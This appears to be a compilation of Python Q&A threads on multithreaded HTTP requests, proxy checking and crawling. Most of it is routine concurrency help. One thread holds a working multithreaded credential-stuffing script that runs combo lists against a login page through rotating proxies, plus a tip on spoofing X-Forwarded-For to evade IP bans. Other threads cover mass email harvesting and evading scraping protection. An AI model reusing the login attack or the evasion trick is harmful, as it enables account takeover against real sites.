I'm building a proxy checker using multithreads, specificly a thread pool from:
from multiprocessing.dummy import Pool as ThreadPool.
The http request is by using urllib2.
What I want to do is for each proxy run 20 requests. If it was 1 threaded it would take too much time. thats where the multithreads power comes to help. So once I set up the proxy I want to run those 20 requests, and manage 2 things. One is to count the exceptions and dump the proxy if too many occurs. 2nd Is to save the average response time and present it later.
I just don't manage to implement the above. But I have implemented it with 1 thread:
import socket
import ssl
import time
import urllib
import urllib2
import httplib
proxyList = []
def loadProxysFromFile(fileName):
global proxyList
with open(fileName) as f:
proxyList = [line.rstrip('\n') for line in f]
def setUrllib2Proxy(proxyAddress):
proxy = urllib2.ProxyHandler({
'http': "http://" + proxyAddress,
'https': "https://" + proxyAddress
})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
def timingRequest(proxy, url):
error = False
setUrllib2Proxy(proxy)
start = time.time()
try:
req = urllib2.Request(url)
urllib2.urlopen(req, timeout=5) #opening the request (getting a response)
except (urllib2.URLError, httplib.BadStatusLine, ssl.SSLError, socket.error) as e:
error = True
end = time.time()
timing = end - start
if error:
print "Error with proxy " + proxy
return 0
else:
print proxy + " Request to " + url + " took: %s" %timing + " seconds."
return timing
# Main
loadProxysFromFile("proxyList.txt")
for proxy in proxyList:
print "Testing: " + proxy
print "\n"
REQUEST_NUM = 20
ERROR_TOLERANCE_NUM = 3
resultList = []
for proxy in proxyList:
avgTime = 0
errorCount = 0
for x in range(0, REQUEST_NUM):
result = timingRequest(proxy, 'https://www.google.com')
if (result == 0):
errorCount += 1
if (errorCount >= ERROR_TOLERANCE_NUM):
break
else:
avgTime += result
if (errorCount < ERROR_TOLERANCE_NUM):
avgTime = avgTime/(REQUEST_NUM-errorCount)
resultList.append(proxy + " has an average response time of: %s" %avgTime)
print '\n'
print "Results Summery: "
print "-----------------"
for res in resultList:
print res
Things that must be done are:
for every proxy: wait until all 20 requests are over before changing proxy. Sync somehow the threads when they adding up to calculate the average response time (includes not to take in account the exceptions)
The best solutions I've read so far is using from multiprocessing.dummy import Pool as ThreadPool and pool.map(func, iterable) but I cant figure out how to implement it in my code.
Related
I test my proxies with this script and it gives many working but when i test the "working" proxies with an other proxy checker only a very little amount works.
Here is the part that's checking if the proxy works:
def process(self, task):
global alive
global dead
global tested
proxy = task
log_msg = str("Trying HTTP proxy%21s " % proxy)
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(
urllib.request.HTTPCookieProcessor(cj),
urllib.request.HTTPRedirectHandler(),
urllib.request.ProxyHandler({'http': proxy})
)
try:
t1 = time.time()
response = opener.open(test_url, timeout=timeout_value).read()
tested += 1
t2 = time.time()
except Exception as e:
log_msg += "%s " % fail_msg
print(Fore.LIGHTRED_EX + log_msg)
dead += 1
tested += 1
return None
log_msg += ok_msg + "Response time: %d" % (int((t2-t1)*1000))
print(Fore.LIGHTGREEN_EX + log_msg)
text_file = open(out_filename, "a")
text_file.write(proxy + "\r\n")
text_file.close()
alive += 1
I have list of a lot of links and I want to use multiprocessing to speed the proccess, here is simplified version, I need it to be ordered like this:
I tried a lot of things, process, pool etc. I always had errors, I need to do it with 4 or 8 threads and make it ordered like this. Thank you for all help. Here is code:
from bs4 import BeautifulSoup
import requests
import time
links = ["http://www.tennisexplorer.com/match-detail/?id=1672704", "http://www.tennisexplorer.com/match-detail/?id=1699387", "http://www.tennisexplorer.com/match-detail/?id=1698990" "http://www.tennisexplorer.com/match-detail/?id=1696623", "http://www.tennisexplorer.com/match-detail/?id=1688719", "http://www.tennisexplorer.com/match-detail/?id=1686305"]
data = []
def essa(match, omega):
aaa = BeautifulSoup(requests.get(match).text, "lxml")
center = aaa.find("div", id="center")
p1_l = center.find_all("th", class_="plName")[0].find("a").get("href")
p2_l = center.find_all("th", class_="plName")[1].find("a").get("href")
return p1_l + " - " + p2_l + " - " + str(omega)
i = 1
start_time = time.clock()
for link in links:
data.append(essa(link, i))
i += 1
for d in data:
print(d)
print(time.clock() - start_time, "seconds")
Spawn several threads of the function and join them together:
from threading import Thread
def essa(match, omega):
aaa = BeautifulSoup(requests.get(match).text, "lxml")
center = aaa.find("div", id="center")
p1_l = center.find_all("th", class_="plName")[0].find("a").get("href")
p2_l = center.find_all("th", class_="plName")[1].find("a").get("href")
print p1_l + " - " + p2_l + " - " + str(omega)
if __name__ == '__main__':
threadlist = []
for index, url in enumerate(links):
t= Thread(target=essa,args=(url, index))
t.start()
threadlist.append(t)
for b in threadlist:
b.join()
You wont get them to print in order, for the simple reason that some http responses take longer than others.
As far I can understand you have the list of links and make requests concurrently to make the process faster. Here is the sample code for multithreading. I hope this will help you. Read the documentation for concurrent futures.
import concurrent.futures
import urllib.request
URLS = ['http://www.foxnews.com/',
'http://www.cnn.com/',
'http://europe.wsj.com/',
'http://www.bbc.co.uk/',
'http://some-made-up-domain.com/']
# Retrieve a single page and report the URL and contents
def load_url(url, timeout):
with urllib.request.urlopen(url, timeout=timeout) as conn:
return conn.read()
# We can use a with statement to ensure threads are cleaned up promptly
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
# Start the load operations and mark each future with its URL
future_to_url = {executor.submit(load_url, url, 60): url for url in URLS}
for future in concurrent.futures.as_completed(future_to_url):
url = future_to_url[future]
try:
data = future.result()
except Exception as exc:
print('%r generated an exception: %s' % (url, exc))
else:
print('%r page is %d bytes' % (url, len(data)))
As a part of an ethical hacking camp, I am working on an assignment where I have to make multiple login requests on a website using proxies. To do that I've come up with following code:
import requests
from Queue import Queue
from threading import Thread
import time
from lxml import html
import json
from time import sleep
global proxy_queue
global user_queue
global hits
global stats
global start_time
def get_default_header():
return {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
'X-Requested-With': 'XMLHttpRequest',
'Referer': 'https://www.example.com/'
}
def make_requests():
global user_queue
while True:
uname_pass = user_queue.get().split(':')
status = get_status(uname_pass[0], uname_pass[1].replace('\n', ''))
if status == 1:
hits.put(uname_pass)
stats['hits'] += 1
if status == 0:
stats['fake'] += 1
if status == -1:
user_queue.put(':'.join(uname_pass))
stats['IP Banned'] += 1
if status == -2:
stats['Exception'] += 1
user_queue.task_done()
def get_status(uname, password):
global proxy_queue
try:
if proxy_queue.empty():
print 'Reloaded proxies, sleeping for 2 mins'
sleep(120)
session = requests.session()
proxy = 'http://' + proxy_queue.get()
login_url = 'http://example.com/login'
header = get_default_header()
header['X-Forwarded-For'] = '8.8.8.8'
login_page = session.get(
login_url,
headers=header,
proxies={
'http':proxy
}
)
tree = html.fromstring(login_page.text)
csrf = list(set(tree.xpath("//input[#name='csrfmiddlewaretoken']/#value")))[0]
payload = {
'email': uname,
'password': password,
'csrfmiddlewaretoken': csrf,
}
result = session.post(
login_url,
data=payload,
headers=header,
proxies={
'http':proxy
}
)
if result.status_code == 200:
if 'access_token' in session.cookies:
return 1
elif 'Please check your email and password.' in result.text:
return 0
else:
# IP banned
return -1
else:
# IP banned
return -1
except Exception as e:
print e
return -2
def populate_proxies():
global proxy_queue
proxy_queue = Queue()
with open('nice_proxy.txt', 'r') as f:
for line in f.readlines():
proxy_queue.put(line.replace('\n', ''))
def hit_printer():
while True:
sleep(5)
print '\r' + str(stats) + ' Combos/min: ' + str((stats['hits'] + stats['fake'])/((time.time() - start_time)/60)),
if __name__ == '__main__':
global user_queue
global proxy_queue
global stats
global start_time
stats = dict()
stats['hits'] = 0
stats['fake'] = 0
stats['IP Banned'] = 0
stats['Exception'] = 0
threads = 200
hits = Queue()
uname_password_file = '287_uname_pass.txt'
populate_proxies()
user_queue = Queue(threads)
for i in range(threads):
t = Thread(target=make_requests)
t.daemon = True
t.start()
hit_printer = Thread(target=hit_printer)
hit_printer.daemon = True
hit_printer.start()
start_time = time.time()
try:
count = 0
with open(uname_password_file, 'r') as f:
for line in f.readlines():
count += 1
if count > 2000:
break
user_queue.put(line.replace('\n', ''))
user_queue.join()
print '####################Result#####################'
while not hits.empty():
print hits.get()
ttr = round(time.time() - start_time, 3)
print 'Time required: ' + str(ttr)
print 'average combos/min: ' + str(ceil(2000/(ttr/60)))
except Exception as e:
print e
So it is expected to make many requests on the website through multiple threads, but it doesn't work as expected. After a few requests, the proxies get banned, and it stops working. Since I'm disposing off the proxy after I use it, it shouldn't be the case. So I believe it might be due to one of the following
In an attempt to make multiple requests using multiple sessions, it's somehow failing to maintain disparateness for not supporting asynchronicity.
The victim site bans IPs based on its groups e.g., Banning all IPs starting with 132.x.x.x on receiving multiple requests from any of the 132.x.x.x IPs
The victim site is using headers like 'X-Forwarded-for', 'Client-IP', 'Via', or a similar header to detect the originating IP. But it seems unlikely because I can log in via by browser, without any proxy, and it doesn't throw any error, meaning my IP isn't exposed in any sense.
I am unsure weather I'm making an error in the threading part or the requests part, any help is appreciated.
I have figured out what the problem was, thanks to #Martijn Pieters, as usual, he's a life saver.
I was using elite level proxies and there was no way the victim site could have found my IP address, however, it was using X-Forwarded-For to detect my root IP address.
Since elite level proxies do not expose the IP address and don't attach the Client-IP header, the only way the victim could detect my IP was using the latest address in X-Forwarded-For. The solution to this problem is setting the X-Forwarded-For header to a random IP address everytime a requests is made which successfully spoofs the victim site into believing that the request is legit.
header['X-Forwarded-For'] = '.'.join([str(random.randint(0,255)) for i in range(4)])
Wrote this crawler in Python, it dumps several parameters to JSON output file based on the input list of domains.
Have this question:
Do I need to close the HTTP connection in each thread? Input data is ca. 5 Million items. It process at the beginning at a rate ca. 50 iterations per second, but later after some time it drops to 1-2 per second and/or hangs (no kernel messages and no errors on stdout)? Can this be code or is network limiting related? I suspect software since when I restart it, it starts again with high rate (ca. 50 iteration per second)
Any tips how to improve the code below are also welcome, especially improve on speed and crawling throughput.
Code in questions:
import urllib2
import pprint
from tqdm import tqdm
import lxml.html
from Queue import Queue
from geoip import geolite2
import pycountry
from tld import get_tld
resfile = open("out.txt",'a')
concurrent = 200
def doWork():
while True:
url = q.get()
status = getStatus(url)
doSomethingWithResult(status)
q.task_done()
def getStatus(ourl):
try:
response = urllib2.urlopen("http://"+ourl)
peer = response.fp._sock.fp._sock.getpeername()
ip = peer[0]
header = response.info()
html = response.read()
html_element = lxml.html.fromstring(html)
generator = html_element.xpath("//meta[#name='generator']/#content")
try:
match = geolite2.lookup(ip)
if match is not None:
country= match.country
try:
c=pycountry.countries.lookup(country)
country=c.name
except:
country=""
except:
country=""
try:
res=get_tld("http://www"+ourl, as_object=True)
tld=res.suffix
except:
tld=""
try:
match = re.search(r'[\w\.-]+#[\w\.-]+', html)
email=match.group(0)
except:
email=""
try:
item= generator[0]
val = "{ \"Domain\":\"http://"+ourl.rstrip()+"\",\"IP:\""+ip+"\"," + "\"Server\":"+ "\""+str(header.getheader("Server")).replace("None","")+"\",\"PoweredBy\":" + "\""+str(header.getheader("X-Powered-By")).replace("None","")+"\""+",\"MetaGenerator\":\""+item+"\",\"Email\":\""+email+"\",\"Suffix\":\""+tld+"\",\"CountryHosted\":\""+country+"\" }"
except:
val = "{ \"Domain\":\"http://"+ourl.rstrip()+"\",\"IP:\""+ip+"\"," + "\"Server\":"+ "\""+str(header.getheader("Server")).replace("None","")+"\",\"PoweredBy\":" + "\""+str(header.getheader("X-Powered-By")).replace("None","")+"\""+",\"MetaGenerator\":\"\",\"Email\":\""+email+"\",\"Suffix\":\""+tld+"\",\"CountryHosted\":\""+country+"\" }"
return val
except Exception as e:
#print "error"+str(e)
pass
def doSomethingWithResult(status):
if status:
resfile.write(str(status)+"\n")
q = Queue(concurrent * 2)
for i in range(concurrent):
t = Thread(target=doWork)
t.daemon = True
t.start()
try:
for url in tqdm(open('list.txt')):
q.put(url.strip())
status = open("status.txt",'w')
status.write(str(url.strip()))
q.join()
except KeyboardInterrupt:
sys.exit(1)
Update 1:
Closing the Socket and FileDescriptor makes it work better, does not seem to hang anymore after some time. Performance is 50 reqs/sec on home laptop and ca 100 req/sec on a VPS
from threading import Thread
import httplib, sys
import urllib2
import pprint
from tqdm import tqdm
import lxml.html
from Queue import Queue
from geoip import geolite2
import pycountry
from tld import get_tld
import json
resfile = open("out.txt",'a')
concurrent = 200
def doWork():
while True:
url = q.get()
status = getStatus(url)
doSomethingWithResult(status)
q.task_done()
def getStatus(ourl):
try:
response = urllib2.urlopen("http://"+ourl)
realsock = response.fp._sock.fp._sock
peer = response.fp._sock.fp._sock.getpeername()
ip = peer[0]
header = response.info()
html = response.read()
realsock.close()
response.close()
html_element = lxml.html.fromstring(html)
generator = html_element.xpath("//meta[#name='generator']/#content")
try:
match = geolite2.lookup(ip)
if match is not None:
country= match.country
try:
c=pycountry.countries.lookup(country)
country=c.name
except:
country=""
except:
country=""
try:
res=get_tld("http://www"+ourl, as_object=True)
tld=res.suffix
except:
tld=""
try:
match = re.search(r'[\w\.-]+#[\w\.-]+', html)
email=match.group(0)
except:
email=""
try:
item= generator[0]
val = "{ \"Domain\":"+json.dumps("http://"+ourl.rstrip())+",\"IP\":\""+ip+"\",\"Server\":"+json.dumps(str(header.getheader("Server")).replace("None",""))+",\"PoweredBy\":" +json.dumps(str(header.getheader("X-Powered-By")).replace("None",""))+",\"MetaGenerator\":"+json.dumps(item)+",\"Email\":"+json.dumps(email)+",\"Suffix\":\""+tld+"\",\"CountryHosted\":\""+country+"\" }"
except:
val = "{ \"Domain\":"+json.dumps("http://"+ourl.rstrip())+",\"IP\":\""+ip+"\"," + "\"Server\":"+json.dumps(str(header.getheader("Server")).replace("None",""))+",\"PoweredBy\":" +json.dumps(str(header.getheader("X-Powered-By")).replace("None",""))+",\"MetaGenerator\":\"\",\"Email\":"+json.dumps(email)+",\"Suffix\":\""+tld+"\",\"CountryHosted\":\""+country+"\" }"
return val
except Exception as e:
print "error"+str(e)
pass
def doSomethingWithResult(status):
if status:
resfile.write(str(status)+"\n")
q = Queue(concurrent * 2)
for i in range(concurrent):
t = Thread(target=doWork)
t.daemon = True
t.start()
try:
for url in tqdm(open('list.txt')):
q.put(url.strip())
status = open("status.txt",'w')
status.write(str(url.strip()))
q.join()
except KeyboardInterrupt:
sys.exit(1)
The handles will be automatically garbage collected, but, you will be better off closing the handles yourself, especially as you are doing this in a tight loop.
You also asked for suggestions for improvement. A big one would be to stop using urllib2 and start using requests instead.
There are many possible options, why your crawling rate drops.
1.) Take care not to crawl to much data from the same domain. Some web servers are configured just to allow one connection per IP address in parallel.
2.) Try to send randomized browser-like http headers (user-agent, referrer, ...) to prevent web server scraping protection, if set.
3.) Use a mature http (parallel) library, like pycurl (has MultiCurl) or requests (grequests). They perform faster for sure.
I'm trying to build a class that uses multiprocessing + requests to make several requests in parallel. I'm running into an issue where it just hangs and gives me a cryptic error message and I'm not sure way.
Below is my code, it basically just uses a Pool with a callback to put results into a list. I have the requirement that I need a "hard timeout" for each URL, i.e. if a URL is taking more than a few seconds to get its content downloaded I just want to skip it. So I use a Pool timeout and do a diff on URLs attempted vs. URL content returned, the ones that were attempted but not returned are assumed to have failed. Here is my code:
import time
import json
import requests
import sys
from urlparse import parse_qs
from urlparse import urlparse
from urlparse import urlunparse
from urllib import urlencode
from multiprocessing import Process, Pool, Queue, current_process
from multiprocessing.pool import ThreadPool
from multiprocessing import TimeoutError
import traceback
from sets import Set
from massweb.pnk_net.pnk_request import pnk_request_raw
from massweb.targets.fuzzy_target import FuzzyTarget
from massweb.payloads.payload import Payload
class MassRequest(object):
def __init__(self, num_threads = 10, time_per_url = 10, request_timeout = 10, proxy_list = [{}]):
self.num_threads = num_threads
self.time_per_url = time_per_url
self.request_timeout = request_timeout
self.proxy_list = proxy_list
self.results = []
self.urls_finished = []
self.urls_attempted = []
self.targets_results = []
self.targets_finished = []
self.targets_attempted = []
def add_to_finished(self, x):
self.urls_finished.append(x[0])
self.results.append(x)
def add_to_finished_targets(self, x):
self.targets_finished.append(x[0])
self.targets_results.append(x)
def get_urls(self, urls):
timeout = float(self.time_per_url * len(urls))
pool = Pool(processes = self.num_threads)
proc_results = []
for url in urls:
self.urls_attempted.append(url)
proc_result = pool.apply_async(func = pnk_request_raw, args = (url, self.request_timeout, self.proxy_list), callback = self.add_to_finished)
proc_results.append(proc_result)
for pr in proc_results:
try:
pr.get(timeout = timeout)
except:
pool.terminate()
pool.join()
pool.terminate()
pool.join()
list_diff = Set(self.urls_attempted).difference(Set(self.urls_finished))
for url in list_diff:
sys.stderr.write("URL %s got timeout" % url)
self.results.append((url, "__PNK_GET_THREAD_TIMEOUT"))
if __name__ == "__main__":
f = open("out_urls_to_fuzz_1mil")
urls_to_request = []
for line in f:
url = line.strip()
urls_to_request.append(url)
mr = MassRequest()
mr.get_urls(urls_to_request)
Here is the function being called by the threads:
def pnk_request_raw(url_or_target, req_timeout = 5, proxy_list = [{}]):
if proxy_list[0]:
proxy = get_random_proxy(proxy_list)
else:
proxy = {}
try:
if isinstance(url_or_target, str):
sys.stderr.write("Requesting: %s with proxy %s\n" % (str(url_or_target), str(proxy)))
r = requests.get(url_or_target, proxies = proxy, timeout = req_timeout)
return (url_or_target, r.text)
if isinstance(url_or_target, FuzzyTarget):
sys.stderr.write("Requesting: %s with proxy %s\n" % (str(url_or_target), str(proxy)))
r = requests.get(url_or_target.url, proxies = proxy, timeout = req_timeout)
return (url_or_target, r.text)
except:
#use this to mark failure on exception
traceback.print_exc()
#edit: this is the line that was breaking it all
sys.stderr.out("A request failed to URL %s\n" % url_or_target)
return (url_or_target, "__PNK_REQ_FAILED")
This seems to work well for smaller sets of URLs, but here is the output:
Requesting: http://www.sportspix.co.za/ with proxy {}
Requesting: http://www.sportspool.co.za/ with proxy {}
Requesting: http://www.sportspredict.co.za/ with proxy {}
Requesting: http://www.sportspro.co.za/ with proxy {}
Requesting: http://www.sportsrun.co.za/ with proxy {}
Requesting: http://www.sportsstuff.co.za/ with proxy {}
Requesting: http://sportsstuff.co.za/2011-rugby-world-cup with proxy {}
Requesting: http://www.sportstar.co.za/4-stroke-racing with proxy {}
Requesting: http://www.sportstats.co.za/ with proxy {}
Requesting: http://www.sportsteam.co.za/ with proxy {}
Requesting: http://www.sportstec.co.za/ with proxy {}
Requesting: http://www.sportstours.co.za/ with proxy {}
Requesting: http://www.sportstrader.co.za/ with proxy {}
Requesting: http://www.sportstravel.co.za/ with proxy {}
Requesting: http://www.sportsturf.co.za/ with proxy {}
Requesting: http://reimo.sportsvans.co.za/ with proxy {}
Requesting: http://www.sportsvans.co.za/4x4andmoreWindhoek.html with proxy {}
Handled exception:Traceback (most recent call last):
File "mass_request.py", line 87, in get_fuzzy_targets
pr.get(timeout = timeout)
File "/usr/lib/python2.7/multiprocessing/pool.py", line 528, in get
raise self._value
AttributeError: 'file' object has no attribute 'out'
On that last exception, the program hangs and I have to completely kill it. AFAIK I'm never trying to access a file object with the attribute "out". My question is... how to fix!? Am I doing something obviously wrong here? Why isn't there a clearer exception?
I think that sys.stderr.out("A request failed to URL %s\n" % url_or_target) should be sys.stderr.write("A request failed to URL %s\n" % url_or_target)